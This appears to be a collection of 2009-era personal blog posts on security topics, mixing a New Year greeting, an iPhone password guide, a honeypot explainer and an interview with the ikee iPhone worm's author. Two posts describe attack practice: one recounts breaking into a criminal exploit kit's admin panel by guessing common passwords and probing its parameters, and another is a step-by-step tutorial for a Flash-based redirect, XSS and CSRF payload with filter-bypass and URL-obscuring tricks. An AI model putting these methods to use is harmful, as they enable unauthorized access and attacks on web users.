Buon anno :D

Sono stata un pò assente in questo periodo perchè mi sto impegnando in progetti che mi prendono molto tempo e che trovo fantastici...

In questo periodo ho letto la trilogia millenium di Stieg Larsson, la storia è molto avvincente e i personaggi adorabili.
Un peccato che molte domande rimangano irrisolte per la morte dell'autore :( ;
ad esempio che combina la sorella di Lisbeth...

Sto anche iniziando un altro libro La matematica del novecento di Odifreddi.

Auguro a tutti un Buon Anno nuovo e vi lascio con una immagine fatta da Achamo

exploitbin project open

exploitbin code project

exploitbin is a pastebin with exploiting functionality and a collaboration open source platform for find exploit on internet

is pretty new and need lot of help !!!

ikee virus for iphone

You have jailbroken your iphone for make it more configurable and you use ssh for uploading stuff and you have not changed your password ???

Most internet site write the default password of the iphone ssh jailbroken ( alpine) this information can used from a malware or a bad user for take information and make in risk your iphone.

In this day there is also a iphone virus

http://is.gd/4Unwx

The virus is really simple it check ip and if find a iphone in the network it try to use default ssh password

For secure your iphone is pretty simple

For this guide, you are going to need MobileTerminal (download it from Cydia):

1. Open the MobileTerminal Application on your device:
   
2. Type in ’su root’ and click enter:
   
3. It will ask for the password so type in ‘alpine’ which is the default password:
   
4. Type in ‘passwd’ and click enter:
   
5. It will ask for a new password (more than 5 characters) so type it in:
   
6. It wil ask your to retype the password:
   

This is the interview with the creator:

[09:02] Hi ikee :-) Thanks for joining me
[09:02] nps
[09:03] Now, as you're well aware, you wrote a virus that is infecting many iPhones in Australia. I guess the real question to start with is why?
[09:04] First i was curious to how far something like this would actually spread, i think what most people were unaware of is the fact it IS a worm and every phone that got infected with it was spreading it (I initially only infected 3 phones when I woke up i checked google and found out a fair few people were hit with it)
[09:05] Secondly i was quite amazed by the number of people who didn't RTFM and change their default passwords.
[09:07] How far did you expect it to spread, exactly?
[09:08] Well i didn't think that many people would have not changed their passwords I was expecting to see maybe 10~ or so people, at first I was not even going to add the replicate/worm code but it was a learning experience and i got a tad carried away :)
[09:11] Are you aware that it has even started to replicate itself overseas?
[09:13] I heard a few stories about it, that would have been sheer luck, the code itself is set to firstly scan the 3G IP range the phone is on, then Optus/Vodafone/Telstra's IP Ranges (I think the reason Optus got hit so hard is because the other 2 are NAT'd) then a random 20 IP ranges. I'm guessing a few phones hit a range that another vulnerable phone was on.
[09:14] (From another country)
[09:15] Well that was my next question: Why does it only seem to be hitting Optus here and Overseas (I was presuming from screenshots I've seen)... So you're saying the Optus network is more vulnerable due to it not using NAT?
[09:17] I don't think it was an Optus fault (Being an Optus user I quite like the fact i can access my iPhone services from the outside world), I think it was mainly the fault of people being to lazy to change their passwords (It only takes a couple of seconds guys) and I hope this taught a few people that.
[09:18] So do you know exactly how many people are currently infected with the "ikee virus"?
[09:20] I can only confirm how many my phone infected alone, which was 100+ phones. I think most of them fixed it (AND I'M HOPING THEY CHANGED THEIR PASSWORDS.)
[09:21] So your major defense seems to be that people left themselves vulnerable, Do you steal stuff from people's houses if they leave the backdoor open?
[09:24] I'll answer your question with two questions, Have you ever used unprotected Wifi? and Technically I did not steal anything, have you ever littered on someone else's property? (Smokers will definitely associate ;))
[09:25] Ok, I suppose I can personally admit to both of them, but it seems alot more to me like vandalism than littering, which isn't something I would do
[09:27] Personally I would class littering as vandalism (They definitely don't want your rubbish there). I admit I probably pissed of a few people, but it was all in good fun (well ok for me anyway)
[09:30] So that explains why you decided to use Rick Astley. In my research, I've been reading about a similar virus (it seems) that contains a picture of an 'asian child' - I havn't seen screenshots of this, but that's how it is described. Are you also responsible for the "Asian Child virus"?
[09:32] Ahh that was a quirk of my bad coding, the 'virus' itself has 4 variations and the first variation would resend its LockBackground.jpg to the victim. I did not comprehend that the infector might have not rebooted their phone after changing the LockBackground to something else (Causing them to send their changed lockbackground instead of Mr Astley)
[09:36] So it's the same virus, but now containing a picture of someone's loved one?
[09:37] Yeah, that was definitely not the intended effect.
[09:39] Are you aware of the possible legal consequences of this (the ikee virus)? Are you concerned?
[09:40] I'd like to think I'm aware, and also I highly doubt I'm in any real trouble (So no not concerned)
[09:43] James01 on Whirlpool asks: at least one person has reported being affected without a jailbreak – seems unlikely given the nature of the phone and what I have garned about the "virus" - is this possible, or are the reports unreliable/mistaken?
[09:44] It only affects jailbroken phones, so people probably just got a little confused
[09:45] vanquish777 on Whirlpool says: What I want to know is, how did I get infected when I had SSH toggled off
[09:46] You didn't :), My guess is you had it on and when the 'virus' hit, it disabled sshd so when you checked it afterwards it appeared to be off
[09:47] Which reminds me, many people have said they are no longer able to disable SSH, is this intended to make sure you can do more damage to users?
[09:50] This was a hard bit for me to do, until i hit this the virus was not destructive at all. My first intention was to change the root/mobile password to random strings, then embed the strings into the LockBackground. Unfortunately passwd uses a tty (and not stdin) for its new password:request (similar to ssh logins, which is why you might find sshpass in /bin/, i had to port it) so to stop the phone getting infected over and over again (and
[09:50] someone else catching on and having mischief with peoples phones) I removed SSHD (cydia reinstall will rememdy the problem)
[09:51] (Cydia reinstall of SSH not reinstall Cydia itself)
[09:53] So you're saying that the only harm this virus causes is the removal of the SSH Daemon, which effectively, disables the initial problem?
[09:53] Well that and the pretty background yes :)
[09:54] You mentioned that there are four versions/variants, what are the differences between them?
[09:55] Variants A-C were quite similar and the ones most people have bought up. Variant D is fair bit different, it stores its files in a completely different place and hides itself a lot more (No random plists in LaunchDaemons)
[09:56] So you're saying that the newest variant is more hidden, is it more malicious?
[09:57] It is a lot more hidden, a think most phones tend to be more secured now so it should die pretty fast. It is a little more malicious it tampers with some Cydia files.
[10:01] Do Android users risk being infected? I'm guessing that the virus would only log in as root:alpine (the default root username and password for the iPhone OS IIRC)
[10:02] AFAIK no unless a user decided to use the same passwords, Although there is a weird quirk I read about dropbear in Android allowing any password (A bug with libcrypt I believe) but I could be very wrong.
[10:03] But even if an android phone was attacked the platform differences would not allow the code to be run :)
[10:04] Just out of curiousity, what do you call what i've named the "ikee virus"?
[10:05] Its in a folder called POC-iWorm (Proof Of Concept) but I never named it (ikee virus works!)
[10:09] You yesterday agreed to send me the source code (and removal instructions), what variant will it contain?
[10:10] C/D whatever version you want :)
[10:11] How about all four? I'll obviously be placing them online - probably Google Code or similar
[10:13] A-C was updated so I don't have the first 2, I forked D from C. (I don't know if its so wise posting the code online, nefarious people that otherwise would not have had the chance could modify it to be quite destructive)
[10:14] Perhaps, But it has become quite clear that there's a load of people that are unsecure, and if anyone wants to do anything bad enough, they are already going to know how.
[10:15] I guess i'm hoping that the jailbreak software will soon have a "enter new root password" prompt for those users that are un-aware.
[10:15] I'll leave the choice up to you :)
[10:15] I'd love to see that
[10:16] or even a random password generated and displayed for the user to write down
[10:17] Yes, it would be very good. I had an iPod Touch a while ago, which I "jailbroke" - admittedly I didn't change the default password. I guess i'm just glad it's not me.
[10:17] Do you plan on making any further variants? If so, why?
[10:18] No, I think the point has been made
[10:18] Have you developed anything PRODUCTIVE in the iPhone world?
[10:21] I'm not too sure what others would class productive. I do not own a MAC or run OSX (Using a linux cross compile toolchain) so it makes it abit of a challenge to develop any applications utilising the UI (I have tho -.-). I think the best program ive developed for it for me was a remote debugging library that sends debug information over the network (Using MCAST)
[10:23] Do you have anything further to add (I'm having a mental blank on questions to ask right now)
[10:26] I hope I did not piss off many people, this was a very simple problem and has an even simplier solution. I thought it was quite funny and I hope others did too :)
[10:27] You mentioned infecting only three iPhones to being with, when did that happen?
[10:28] Around 4am November 6th (Yeah I have no life)
[10:31] To confirm, other than replicating itself, adding the picture of Rick Astley, and removing the SSH Daemon, are we likely to find anything else it does?
[10:32] Nothing, and if you're releasing the source code people will be able to see that :)
[10:33] Can you please explain to me, how an infected user would remove the different versions correctly?
[10:33] by correctly, I mean completely.
[10:33] Sure, variants A-C store files in these directories
[10:34] /bin/poc-bbot
[10:34] /bin/sshpass
[10:34] /var/log/youcanbeclosertogod.jpg
[10:34] /var/mobile/LockBackground.jpg
[10:35] /System/Library/LaunchDaemons/com.ikey.bbot.plist
[10:35] /var/lock/bbot.lock
[10:35] using an rm (in SSH or mobile-terminal on those files will remove it)
[10:36] then reboot the phone, change your password and reinstall SSH
[10:36] For variant D its abit different
[10:36] The locations are
[10:37] /usr/libexec/cydia/startup
[10:37] /usr/libexec/cydia/startup.so
[10:37] /usr/libexec/cydia/startup-helper
[10:37] /System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist
[10:38] Of course cydia used these files previously so you may need to reinstall it after deleting this files
[10:38] *these
[10:38] So the D variant overwrites system files?
[10:39] Overwrits cydia's files
[10:39] *Overwrites
[10:39] Sorry, I'm not an expert at the iPhone OS :P
[10:39] Neither :P
[10:40] So none of your versions do contain any password changing commands?
[10:40] I mean, so when I provide uninstall instructions, I can tell them to use alpine as the password ?
[10:41] None of the code changes passwords
[10:42] Thanks for your time ikee, and I really hope you do get into developing things that are productive sometime soon.
[10:42] me too :) and no problems
[10:42] Perhaps on the Android platform (Yes, I know, I'm a fanboy)
[10:42] I just downloaded the x86 iso, so maybe :P
[10:43] I'll ask you more about that after I end this logging session, Cheers :)
[10:43] Ciaoo
End of #Interview_Room buffer Sun Nov 08 10:43:58 2009

Dropbox open source !!!

Is open Votebox a application for choose what new feature have the priority on other in the Dropbox application!

I'm a debian user and im really sad that dropbox is not in the debian repository because the dropbox images are copyrighted ...
so i have open a group for make dropbox completly open source and GPL for make it added in the debian repository

Please vote here


*you have to loginin for vote!

Honeypot and Honeynet

In this day i have try some new cool technology that i love...

Honeypot

What they are? a honeypot is a fictional vulnerable system used to attract malicius software in the intent of use the fake bugs on the server and at the same time to grab information about the attacker and the technics used for attacks. A honeynet is a network of two or more honeypot.

All the data retrived by a honeypot can be used for many reason, try to make a profile of the attacker, for research tring to steal the exploit and 0day stuff used by the attacker and know new vulnerability and can also be used in a legal procedure.

The honeypot are divided in three level depending on how deep an attacker can interact with it

Low interation are emulated by software and the interaction is really inconsistent

medium interaction they are chrooted or jailed and provide a limited system access

high interation the attacker can have full access on the server

they are also classified on the data that they can collect

Production can collect only limited information

Research can collect more information about the attacker and the strumentation used for the attack, they are used for reasearch by goverment and military.

Another version of honeypot are used for capture spammers giving fake smtp convicing the abuser that is a usable smtp relay for sending all sort of email when in fact is not and also can try to intercept the ip of the illegit user.

Some honeypot can also try to assorb and reverse the malware when it try to attack the fake server for research analysing the binary file.

Some honeypot software can be:

Labrea is a tarpitting honeypot used for deceive the attacker scanner showing faking server with all port open in the unused network ip web adress for tarpitting but this can be useless with multithreading scanners.

Nepenthes is a good botnet detector and tracker and can also try to reverse the binary file and shellcode

Dionaea the successor of nepenthes developed by the same team http://dionaea.carnivore.it/ and is a part of the google summer code.

Honeyd is a small daemon need for create virtual hosts on a network. this virtual host created can be configured for attract intruder of specific vulnerability.

For make a honeypot work you have to be really patient !!! and wait...

a intruder can take lot of time before try to compromise it.

The best is to have a firewall and other security tools for have the most possible data and information about the intrusion.

Liberty Exploit pack... exploited!

Liberty Exploit System
latest: 1.0.5

exploits:
MS06-014 Internet Explorer (MDAC) Remote Code Execution Exploit
PDF util.printf(), PDF collab.collectEmailInfo(), PDF collab.getIcon()
Flash 9
MS DirectShow
Snapshot
Java 0day

price: 500$

Yesterday i was looking for this packet of exploits called Liberty pack.

So it was really interesting and more interesting when i have found that the default username and password is user and pass ...

so i have search in malwareurl for a cpanel admin.php of liberty pack...

the first panel found i had try user and pass for login but don't work so i think that also the utilizator of liberty pack know now that leave the default password is insecure.

So i have try the most common passwords = 1234,god,password and... it work!!!

Now i have the access to the liberty pack cpanel

it looks nice but not so nice for a 500$ exploit pack, is the essential for make it work...

Ok is not really big, i have see some other of 15k uniques visits but is not bad

It inject for the most in ie7 and old ie version

The principal infected country is Turkey

The most infected OS is windows xp but there is also a strange Unknow system that i suspect to be some "crew" windows version like tinyxp or blackxp

This is one of the most interesting part the referreals

looks like a turkish forum infected http://www.msxlabs.org/

naturally about windows stuff :D

and also the other referreals are all forums

(i suppose that the attacker inject in the post a invisible frame about the exploited page for infect other user of the forum)

Ok this is the exploit used for infect the users

how i have find it... simple looking in the page source i have see a id=6 about exploits commented

i have try to insert it in the admin page and i have see the redirection to the exploit page :D

what that exploit number means ? ms06-014 is a vulnerability in the microsoft data access components!!!

id=4 reset the counter

i have try to inject some code in the upload form but don't work for now...

this are the files used by liberty pack

site.com/index.php
site.com/download.pdf
site.com/Hidden.swf
site.com/update.php
site.com/update.exe
site.com/admin.php

thanks everyone for listening

Jump/XSS/CSRF in Flash

Hello everyone sorry for my absencebut i had lot stuff to do.

today i talk about Jump/XSS/CSRF in Flash.

The point of this tutorial is about build a redirect with flash jump

For the start we need to use a precompiled swf

fly.tar.gz

we have to upload the swf file to a webserver i had used altervista.org for it

than we have to make a file txt with the same name of the swf like test.swf and test.txt

now we have to edit the txt file

this are example of the edit of file .txt

jump to http://drunkgeisha.noblogs.org
0,http://drunkgeisha.noblogs.org

open window to http://drunkgeisha.noblogs.org
1,http://drunkgeisha.noblogs.org

send GET Request to drunkgeisha.altervista.org
2,http://drunkgeisha.altervista.org/?hello

send POST Request to drunkgeisha.altervista.org
3,http://drunkgeisha.altervista.org/?hello,,,str=string

Call JavaScript
4,alert(/xss/)

now you have to try it

for do it you need only to write in the browser

test.swf?sec80=http://yoursite/test.txt

this string may be better for bypass some filter

test.swf?sec80=http://yoursite/test.txt&80sec.swf

if everythings is correct you can see this

now you have to embed it on some page

i have used tinyurl for obscure better the url http://tinyurl.com/yhh5x7l = http://drunkgeisha.altervista.org/prova.swf?sec80=http://drunkgeisha.altervista.org/prova.txt

the result is this

http://drunkgeisha.altervista.org/index.html

and this on blogspot

sorry for the bad quality but is my first tutorial video